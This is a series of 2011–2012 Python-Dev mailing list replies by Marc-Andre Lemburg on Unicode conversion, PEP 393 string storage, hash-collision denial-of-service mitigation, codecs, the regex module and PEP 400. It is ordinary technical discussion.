Nick Coghlan wrote: The reason Python 2's implicit str-unicode conversions are so problematic isn't just because they're implicit: it's because they effectively assume *latin-1* as the encoding on the 8-bit str side. The implicit conversion in Python2 only works with ASCII content, pretty much like what you describe here. Note that e.g. UTF-16 is not an ASCII super set, but the ASCII assumption still works: u'abc'.encode('utf-16-le').decode('ascii') u'a\x00b\x00c\x00' Apart from that nit (which can be resolved in most cases by disallowing 0 bytes), I still believe that the Python2 implicit conversion between Unicode and 8-bit strings is a very useful feature in practice. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 21 2012) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-02-13: Released eGenix pyOpenSSL 0.13http://egenix.com/go26 2012-02-09: Released mxODBC.Zope.DA 2.0.2 http://egenix.com/go25 2012-02-06: Released eGenix mx Base 3.2.3 http://egenix.com/go24 ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PEP: New timestamp formats
Nick Coghlan wrote: On Thu, Feb 2, 2012 at 10:16 PM, Victor Stinner Add an argument to change the result type - There should also be a description of the set a boolean flag to request high precision output approach. You mean something like: time.time(hires=True)? Or time.time(decimal=True)? Yeah, I was thinking hires as the short form of high resolution, but it's a little confusing since it also parses as the word hires (i.e. hire+s). hi_res, hi_prec (for high precision) or full_prec (for full precision) might be better. Isn't the above (having the return type depend on an argument setting) something we generally try to avoid ? I think it's better to settle on one type for high-res timers and add a new API(s) for it. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 02 2012) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Counting collisions for the win
Frank Sievertsen wrote: Hello, I'd still prefer to see a randomized hash()-function (at least for 3.3). But to protect against the attacks it would be sufficient to use randomization for collision resolution in dicts (and sets). What if we use a second (randomized) hash-function in case there are many collisions in ONE lookup. This hash-function is used only for collision resolution and is not cached. This sounds a lot like what I'm referring to as universal hash function in the discussion on the ticket: http://bugs.python.org/issue13703#msg150724 http://bugs.python.org/issue13703#msg150795 http://bugs.python.org/issue13703#msg151813 However, I don't like the term random in there. It's better to make the approach deterministic to avoid issues with not being able to easily reproduce Python application runs for debugging purposes. If you find that the data is manipulated, simply incrementing the universal hash parameter and rehashing the dict with that parameter should be enough to solve the issue (if not, which is highly unlikely, the dict will simply reapply the fix). No randomness needed. BTW: I attached a demo script to the ticket which demonstrates both types of collisions using integers. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jan 23 2012) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Hash collision security issue (now public)
Mark Shannon wrote: Michael Foord wrote: Hello all, A paper (well, presentation) has been published highlighting security problems with the hashing algorithm (exploiting collisions) in many programming languages Python included: http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf Although it's a security issue I'm posting it here because it is now public and seems important. The issue they report can cause (for example) handling an http post to consume horrible amounts of cpu. For Python the figures they quoted: reasonable-sized attack strings only for 32 bits Plone has max. POST size of 1 MB 7 minutes of CPU usage for a 1 MB request ~20 kbits/s → keep one Core Duo core busy This was apparently reported to the security list, but hasn't been responded to beyond an acknowledgement on November 24th (the original report didn't make it onto the security list because it was held in a moderation queue). The same vulnerability was reported against various languages and web frameworks, and is already fixed in some of them. Their recommended fix is to randomize the hash function. The attack relies on being able to predict the hash value for a given string. Randomising the string hash function is quite straightforward. There is no need to change the dictionary code. A possible (*untested*) patch is attached. I'll leave it for those more familiar with unicodeobject.c to do properly. The paper mentions that several web frameworks work around this by limiting the number of parameters per GET/POST/HEAD request. This sounds like a better alternative than randomizing the hash function of strings. Uncontrollable randomization has issues when you work with multi-process setups, since the processes would each use different hash values for identical strings. Putting the base_hash value under application control could be done to solve this problem, making sure that all processes use the same random base value. BTW: Since your randomization trick uses the current time, it would also be rather easy to tune an attack to find the currently used base_hash. To make this safe, you'd have to use a more random source for initializing the base_hash. Note that the same hash collision attack can be used for other key types as well, e.g. integers (where it's very easy to find hash collisions), so this kind of randomization would have to be applied to other basic types too. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 29 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PEP 393 close to pronouncement
Victor Stinner wrote: Given that I've been working on and maintaining the Python Unicode implementation actively or by providing assistance for almost 12 years now, I've also thought about whether it's still worth the effort. Thanks for your huge work on Unicode, Marc-Andre! Thanks. I enjoyed working it on it, but priorities are different now, and new projects are waiting :-) My interests have shifted somewhat into other directions and I feel that helping Python reach world domination in other ways makes me happier than fighting over Unicode standards, implementations, special cases that aren't special enough, and all those other nitty-gritty details that cause long discussions :-) Someone said that we still need to define what a character is! By the way, what is a code point? I'll leave that as exercise for the interested reader to find out :-) (Hint: Google should find enough hits where I've explained those things on various mailing lists and in talks I gave.) So I feel that the PEP 393 change is a good time to draw a line and leave Unicode maintenance to Ezio, Victor, Martin, and all the others that have helped over the years. I know it's in good hands. I don't understand why you would like to stop contribution to Unicode, but I only have limited time available for these things and am nowadays more interested in getting others to recognize just how great Python is, than actually sitting down and writing patches for it. Unicode was my baby for quite a few years, but I now have two kids which need more love and attention :-) well, as you want. We will try to continue your work. Thanks. Cheers, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 11 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PEP 393 close to pronouncement
Guido van Rossum wrote: Given the feedback so far, I am happy to pronounce PEP 393 as accepted. Martin, congratulations! Go ahead and mark ity as Accepted. (But please do fix up the small nits that Victor reported in his earlier message.) I've been working on feedback for the last few days, but I guess it's too late. Here goes anyway... I've only read the PEP and not followed the discussion due to lack of time, so if any of this is no longer valid, that's probably because the PEP wasn't updated :-) Resizing Codecs use resizing a lot. Given that PyCompactUnicodeObject does not support resizing, most decoders will have to use PyUnicodeObject and thus not benefit from the memory footprint advantages of e.g. PyASCIIObject. Data structure -- The data structure description in the PEP appears to be wrong: PyASCIIObject has a wchar_t *wstr pointer - I guess this should be a char *str pointer, otherwise, where's the memory footprint advantage (esp. on Linux where sizeof(wchar_t) == 4) ? I also don't see a reason to limit the UCS1 storage version to ASCII. Accordingly, the object should be called PyLatin1Object or PyUCS1Object. Here's the version from the PEP: typedef struct { PyObject_HEAD Py_ssize_t length; Py_hash_t hash; struct { unsigned int interned:2; unsigned int kind:2; unsigned int compact:1; unsigned int ascii:1; unsigned int ready:1; } state; wchar_t *wstr; } PyASCIIObject; typedef struct { PyASCIIObject _base; Py_ssize_t utf8_length; char *utf8; Py_ssize_t wstr_length; } PyCompactUnicodeObject; Typedef'ing Py_UNICODE to wchar_t and using wchar_t in existing code will cause problems on some systems where whcar_t is a signed type. Python assumes that Py_UNICODE is unsigned and thus doesn't check for negative values or takes these into account when doing range checks or code point arithmetic. On such platform where wchar_t is signed, it is safer to typedef Py_UNICODE to unsigned wchar_t. Accordingly and to prevent further breakage, Py_UNICODE should not be deprecated and used instead of wchar_t throughout the code. Length information -- Py_UNICODE access to the objects assumes that len(obj) == length of the Py_UNICODE buffer. The PEP suggests that length should not take surrogates into account on UCS2 platforms such as Windows. The causes len(obj) to not match len(wstr). As a result, Py_UNICODE access to the Unicode objects breaks when surrogate code points are present in the Unicode object on UCS2 platforms. The PEP also does not explain how lone surrogates will be handled with respect to the length information. Furthermore, determining len(obj) will require a loop over the data, checking for surrogate code points. A simple memcpy() is no longer enough. I suggest to drop the idea of having len(obj) not count wstr surrogate code points to maintain backwards compatibility and allow for working with lone surrogates. Note that the whole surrogate debate does not have much to do with this PEP, since it's mainly about memory footprint savings. I'd also urge to do a reality check with respect to surrogates and non-BMP code points: in practice you only very rarely see any non-BMP code points in your data. Making all Python users pay for the needs of a tiny fraction is not really fair. Remember: practicality beats purity. API --- Victor already described the needed changes. Performance --- The PEP only lists a few low-level benchmarks as basis for the performance decrease. I'm missing some more adequate real-life tests, e.g. using an application framework such as Django (to the extent this is possible with Python3) or a server like the Radicale calendar server (which is available for Python3). I'd also like to see a performance comparison which specifically uses the existing Unicode APIs to create and work with Unicode objects. Most extensions will use this way of working with the Unicode API, either because they want to support Python 2 and 3, or because the effort it takes to port to the new APIs is too high. The PEP makes some statements that this is slower, but doesn't quantify those statements. Memory savings -- The table only lists string sizes up 8 code points. The memory savings for these are really only significant for ASCII strings on 64-bit platforms, if you use the default UCS2 Python build as basis. For larger strings, I expect the savings to be more significant. OTOH, a single non-BMP code point in such a string would cause the savings to drop significantly again. Complexity -- In order to benefit from the new API, any code that has to deal with low-level Py_UNICODE access to the Unicode objects will have to be adapted. For best performance, each algorithm will have to be implemented for all three storage types. Not doing so, will result in a slow-down, if I read the PEP correctly. It's difficult to say, of what scale, since that information
Re: [Python-Dev] Not able to do unregister a code
Jai Sharma wrote: Hi, I am facing a memory leaking issue with codecs. I make my own ABC class and register it with codes. import codecs codecs.register(ABC) but I am not able to remove ABC from memory. Is there any alternative to do that. The ABC codec search function gets added to the codec registry search path list which currently cannot be accessed directly. There is no API to unregister a codec search function, since deregistration would break the codec cache used by the registry to speedup codec lookup. Why would you want to unregister a codec search function ? -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Sep 15 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-10-04: PyCon DE 2011, Leipzig, Germany19 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Ctypes and the stdlib (was Re: LZMA compression support in 3.3)
Guido van Rossum wrote: On Sun, Aug 28, 2011 at 11:23 AM, Stefan Behnel stefan...@behnel.de wrote: Hi, sorry for hooking in here with my usual Cython bias and promotion. When the question comes up what a good FFI for Python should look like, it's an obvious reaction from my part to throw Cython into the game. Terry Reedy, 28.08.2011 06:58: Dan, I once had the more or less the same opinion/question as you with regard to ctypes, but I now see at least 3 problems. 1) It seems hard to write it correctly. There are currently 47 open ctypes issues, with 9 being feature requests, leaving 38 behavior-related issues. Tom Heller has not been able to work on it since the beginning of 2010 and has formally withdrawn as maintainer. No one else that I know of has taken his place. Cython has an active set of developers and a rather large and growing user base. It certainly has lots of open issues in its bug tracker, but most of them are there because we *know* where the development needs to go, not so much because we don't know how to get there. After all, the semantics of Python and C/C++, between which Cython sits, are pretty much established. Cython compiles to C code for CPython, (hopefully soon [1]) to Python+ctypes for PyPy and (mostly [2]) C++/CLI code for IronPython, which boils down to the same build time and runtime kind of dependencies that the supported Python runtimes have anyway. It does not add dependencies on any external libraries by itself, such as the libffi in CPython's ctypes implementation. For the CPython backend, the generated code is very portable and is self-contained when compiled against the CPython runtime (plus, obviously, libraries that the user code explicitly uses). It generates efficient code for all existing CPython versions starting with Python 2.4, with several optimisations also for recent CPython versions (including the upcoming 3.3). 2) It is not trivial to use it correctly. Cython is basically Python, so Python developers with some C or C++ knowledge tend to get along with it quickly. I can't say yet how easy it is (or will be) to write code that is portable across independent Python implementations, but given that that field is still young, there's certainly a lot that can be done to aid this. Cythin does sound attractive for cross-Python-implementation use. This is exciting. I think it needs a SWIG-like companion script that can write at least first-pass ctypes code from the .h header files. Or maybe it could/should use header info at runtime (with the .h bundled with a module). From my experience, this is a nice to have more than a requirement. It has been requested for Cython a couple of times, especially by new users, and there are a couple of scripts out there that do this to some extent. But the usual problem is that Cython users (and, similarly, ctypes users) do not want a 1:1 mapping of a library API to a Python API (there's SWIG for that), and you can't easily get more than a trivial mapping out of a script. But, yes, a one-shot generator for the necessary declarations would at least help in cases where the API to be wrapped is somewhat large. Hm, the main use that was proposed here for ctypes is to wrap existing libraries (not to create nicer APIs, that can be done in pure Python on top of this). In general, an existing library cannot be called without access to its .h files -- there are probably struct and constant definitions, platform-specific #ifdefs and #defines, and other things in there that affect the linker-level calling conventions for the functions in the library. (Just like Python's own .h files -- e.g. the extensive renaming of the Unicode APIs depending on narrow/wide build) How does Cython deal with these? I wonder if for this particular purpose SWIG isn't the better match. (If SWIG weren't universally hated, even by its original author. :-) SIP is an alternative to SWIG: http://www.riverbankcomputing.com/software/sip/intro http://pypi.python.org/pypi/SIP and there are a few others as well: http://wiki.python.org/moin/IntegratingPythonWithOtherLanguages 3) It seems to be slower than compiled C extension wrappers. That, at least, was the discovery of someone who re-wrote pygame using ctypes. (The hope was that using ctypes would aid porting to 3.x, but the time penalty was apparently too much for time-critical code.) Cython code can be as fast as C code, and in some cases, especially when developer time is limited, even faster than hand written C extensions. It allows for a straight forward optimisation path from regular Python code down to the speed of C, and trivial interaction with C code itself, if the need arises. Stefan [1] The PyPy port of Cython is currently being written as a GSoC project. [2] The IronPython port of Cython was written to facility a NumPy port to the .NET environment. It's currently not a complete port of all Cython
Re: [Python-Dev] PEP 393 review
Martin v. Löwis wrote: tl;dr: PEP-393 reduces the memory usage for strings of a very small Django app from 7.4MB to 4.4MB, all other objects taking about 1.9MB. Am 26.08.2011 16:55, schrieb Guido van Rossum: It would be nice if someone wrote a test to roughly verify these numbers, e.v. by allocating lots of strings of a certain size and measuring the process size before and after (being careful to adjust for the list or other data structure required to keep those objects alive). I have now written a Django application to measure the effect of PEP 393, using the debug mode (to find all strings), and sys.getsizeof: https://bitbucket.org/t0rsten/pep-393/src/ad02e1b4cad9/pep393utils/djmemprof/count/views.py The results for 3.3 and pep-393 are attached. The Django app is small in every respect: trivial ORM, very few objects (just for the sake of exercising the ORM at all), no templating, short strings. The memory snapshot is taken in the middle of a request. The tests were run on a 64-bit Linux system with 32-bit Py_UNICODE. For comparison, could you run the test of the unmodified Python 3.3 on a 16-bit Py_UNICODE version as well ? Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Aug 29 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-10-04: PyCon DE 2011, Leipzig, Germany36 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PEP 393 Summer of Code Project
Stefan Behnel wrote: Isaac Morland, 26.08.2011 04:28: On Thu, 25 Aug 2011, Guido van Rossum wrote: I'm not sure what should happen with UTF-8 when it (in flagrant violation of the standard, I presume) contains two separately-encoded surrogates forming a valid surrogate pair; probably whatever the UTF-8 codec does on a wide build today should be good enough. Similarly for encoding to UTF-8 on a wide build if one managed to create a string containing a surrogate pair. Basically, I'm for a garbage-in-garbage-out approach (with separate library functions to detect garbage if the app is worried about it). If it's called UTF-8, there is no decision to be taken as to decoder behaviour - any byte sequence not permitted by the Unicode standard must result in an error (although, of course, *how* the error is to be reported could legitimately be the subject of endless discussion). There are security implications to violating the standard so this isn't just legalistic purity. Hmmm, doesn't look good: Python 2.6.1 (r261:67515, Jun 24 2010, 21:47:49) [GCC 4.2.1 (Apple Inc. build 5646)] on darwin Type help, copyright, credits or license for more information. '\xed\xb0\x80'.decode ('utf-8') u'\udc00' Incorrect! Although this is a narrow build - I can't say what the wide build would do. Works the same for me in a wide Py2.7 build, but gives me this in Py3: Python 3.1.2 (r312:79147, Sep 27 2010, 09:57:50) [GCC 4.4.3] on linux2 Type help, copyright, credits or license for more information. b'\xed\xb0\x80'.decode ('utf-8') Traceback (most recent call last): File stdin, line 1, in module UnicodeDecodeError: 'utf8' codec can't decode bytes in position 0-2: illegal encoding Same for current Py3.3 and the PEP393 build (although both have a better exception message now: UnicodeDecodeError: 'utf8' codec can't decode bytes in position 0-1: invalid continuation byte). The reason for this is that the UTF-8 codec in Python 2.x has never rejected lone surrogates and it was used to store Unicode literals in pyc files (using marshal) and also by pickle for transferring Unicode strings, so we could simply reject lone surrogates, since this would have caused compatibility problems. That change was made in Python 3.x by having a special error handler surrogatepass which allows the UTF-8 codec to process lone surrogates as well. BTW: I'd love to join the discussion about PEP 393, but unfortunately I'm swamped with work, so these are just a few comments... What I'm missing in the discussion is statistics of the effects of the patch (both memory and performance) and the effect on 3rd party extensions. I'm not convinced that the memory/speed tradeoff is worth the breakage or whether the patch actually saves memory in real world applications and I'm unsure whether the needed code changes to the binary Python Unicode API can be done in a minor Python release. Note that in the worst case, a PEP 393 Unicode object will save three versions of the same string, e.g. on Windows with sizeof(wchar_t)==2: A UCS4 version in str, a UTF-8 version in utf8 (this gets build whenever Python needs a UTF-8 version of the Object) and a wchar_t version in wstr (which gets build whenever Python codecs or extensions need Py_UNICODE or a wchar_t representation). On all platforms, in the case where you store a Latin-1 non-ASCII string: str holds the Latin-1 string, utf8 the UTF-8 version and wstr the 2- or 4-bytes wchar_t version. * A note on terminology: Python stores Unicode as code points. A Unicode code point refers to any value in the Unicode code range which is 0 - 0x10. Lone surrogates, unassigned and illegal code points are all still code points - this is a detail people often forget. Various code points in Unicode have special meanings and some are not allowed to be used in encodings, but that does not make them rule them out from being stored and processed as code points. Code units are only used in encoded versions Unicode, e.g. the UTF-8, -16, -32. Mixing code units and code points can cause much confusion, so it's better to talk only about code point when referring to Python Unicode objects, since you only ever meet code units when looking at the the bytes output of the codecs. This is important to know, since Python is not only meant to process Unicode, but also to build Unicode strings, so a careful distinction has to be made when considering what is correct and what not: codecs have to follow much more strict rules than Python itself. * A note on surrogates: These are just one particular problem where you run into the situation where splitting a Unicode string potentially breaks a combination of code points. There are a few other types of code points that cause similar problems, e.g. combining code points. Simply going with UCS-4 does not solve the problem, since even with UCS-4 storage, you can still have surrogates in your Python Unicode string. As with many things, it is important
Re: [Python-Dev] Should we move to replace re with regex?
Guido van Rossum wrote: I just made a pass of all the Unicode-related bugs filed by Tom Christiansen, and found that in several, the response was this is fixed in the regex module [by Matthew Barnett]. I started replying that I thought that we should fix the bugs in the re module (i.e., really in _sre.c) but on second thought I wonder if maybe regex is mature enough to replace re in Python 3.3. It would mean that we won't fix any of these bugs in earlier Python versions, but I could live with that. However, I don't know much about regex -- how compatible is it, how fast is it (including extreme cases where the backtracking goes crazy), how bug-free is it, and so on. Plus, how much work would it be to actually incorporate it into CPython as a complete drop-in replacement of the re package (such that nobody needs to change their imports or the flags they pass to the re module). We'd also probably have to train some core developers to be familiar enough with the code to maintain and evolve it -- I assume we can't just volunteer Matthew to do so forever... :-) What's the alternative? Is adding the requested bug fixes and new features to _sre.c really that hard? Why not simply add the new lib, see whether it works out and then decide which path to follow. We've done that with the old regex lib. It took a few years and releases to have people port their applications to the then new re module and syntax, but in the end it worked. With a new regex library there are likely going to be quite a few subtle differences between re and regex - even if it's just doing things in a more Unicode compatible way. I don't think anyone can actually list all the differences given the complex nature of regular expressions, so people will likely need a few years and releases to get used it before a switch can be made. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Aug 27 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-10-04: PyCon DE 2011, Leipzig, Germany38 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Should we move to replace re with regex?
Guido van Rossum wrote: On Fri, Aug 26, 2011 at 3:09 PM, M.-A. Lemburg m...@egenix.com wrote: Guido van Rossum wrote: I just made a pass of all the Unicode-related bugs filed by Tom Christiansen, and found that in several, the response was this is fixed in the regex module [by Matthew Barnett]. I started replying that I thought that we should fix the bugs in the re module (i.e., really in _sre.c) but on second thought I wonder if maybe regex is mature enough to replace re in Python 3.3. It would mean that we won't fix any of these bugs in earlier Python versions, but I could live with that. However, I don't know much about regex -- how compatible is it, how fast is it (including extreme cases where the backtracking goes crazy), how bug-free is it, and so on. Plus, how much work would it be to actually incorporate it into CPython as a complete drop-in replacement of the re package (such that nobody needs to change their imports or the flags they pass to the re module). We'd also probably have to train some core developers to be familiar enough with the code to maintain and evolve it -- I assume we can't just volunteer Matthew to do so forever... :-) What's the alternative? Is adding the requested bug fixes and new features to _sre.c really that hard? Why not simply add the new lib, see whether it works out and then decide which path to follow. We've done that with the old regex lib. It took a few years and releases to have people port their applications to the then new re module and syntax, but in the end it worked. With a new regex library there are likely going to be quite a few subtle differences between re and regex - even if it's just doing things in a more Unicode compatible way. I don't think anyone can actually list all the differences given the complex nature of regular expressions, so people will likely need a few years and releases to get used it before a switch can be made. I can't say I liked how that transition was handled last time around. I really don't want to have to tell people Oh, that bug is fixed but you have to use regex instead of re and then a few years later have to tell them Oh, we're deprecating regex, you should just use re. No, you tell them: If you want Unicode 6 semantics, use regex, if you're fine with Unicode 2.0/3.0 semantics, use re. After all, it's not like re suddenly stopped working :-) I'm really hoping someone has more actual technical understanding of re vs. regex and can give us some facts about the differences, rather than, frankly, FUD. The good part is that it's based on the re code, the FUD comes from the fact that the new lib is 380kB larger than the old one and that's not even counting the generated 500kB of lookup tables. If no one steps up to do a review or analysis, I think the only practical way to test the lib is to give it a prominent chance to prove itself. The other aspect is maintenance. Perhaps we could have a summer of code student do a review and analysis to get familiar with the code and then have at least two developers know the code well enough to support it for a while. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Aug 27 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-10-04: PyCon DE 2011, Leipzig, Germany38 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)
Victor Stinner wrote: Le 28/07/2011 11:28, Victor Stinner a écrit : Please do keep the original implementation around (e.g. renamed to codecs.open_stream()), though, so that it's still possible to get easy-to-use access to codec StreamReader/Writers. I will add your alternative to the PEP (except if you would like to do that yourself?). If I understood correctly, you propose to: * rename codecs.open() to codecs.open_stream() * change codecs.open() to reuse open() (and so io.TextIOWrapper) (and don't deprecate anything) I added your proposal to the PEP as an Alternative Approache. Thanks. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jul 29 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)
Victor Stinner wrote: Hi, Three weeks ago, I posted a draft on my PEP on this mailing list. I tried to include all remarks you made, and the PEP is now online: http://www.python.org/dev/peps/pep-0400/ It's now unclear to me if the PEP will be accepted or rejected. I don't know what to do to move forward. The PEP still compares apples and oranges, issues and features, and doesn't cover the fact that it is proposing to not just deprecate a feature, but a part of a design concept which will then no longer be available in Python. I'm still -1 on that part of the PEP. As I mentioned before, having codecs.open() changed to be a wrapper around io.open() in Python 3.3, should be investigated. If it doesn't cause too much trouble, this would be a good idea. Please do keep the original implementation around (e.g. renamed to codecs.open_stream()), though, so that it's still possible to get easy-to-use access to codec StreamReader/Writers. Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jul 28 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Draft PEP: Deprecate codecs.StreamReader and codecs.StreamWriter
Victor Stinner wrote: Hi, Last may, I proposed to deprecate open() function, StreamWriter and StreamReader classes of the codecs module. I accepted to keep open() after the discussion on python-dev. Here is a more complete proposition as a PEP. It is a draft and I expect a lot of comments :) The PEP's arguments for deprecating two essential codec design components are very one sided, by comparing issues to features. Please add all the comments I've made on the subject to the PEP. The most important one missing is the fact and major difference that TextIOWrapper does not work on a per codec basis, but only on a per stream basis. By removing the StreamReader and StreamWriter API parts of the codec design, you essentially make it impossible to add per codec variations and optimizations that require full access to the stream interface. A mentioned before, many improvements are possible and lots of those can build on TextIOWrapper and the incremental codec parts. That said, I'm not really up for a longer discussion on this. We've already had the discussion and decided against removing those parts of the codec API. Redirecting codecs.open() to open() should be investigated. For the issues you mention in the PEP, please open tickets or add ticket references to the PEP. Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jul 07 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com 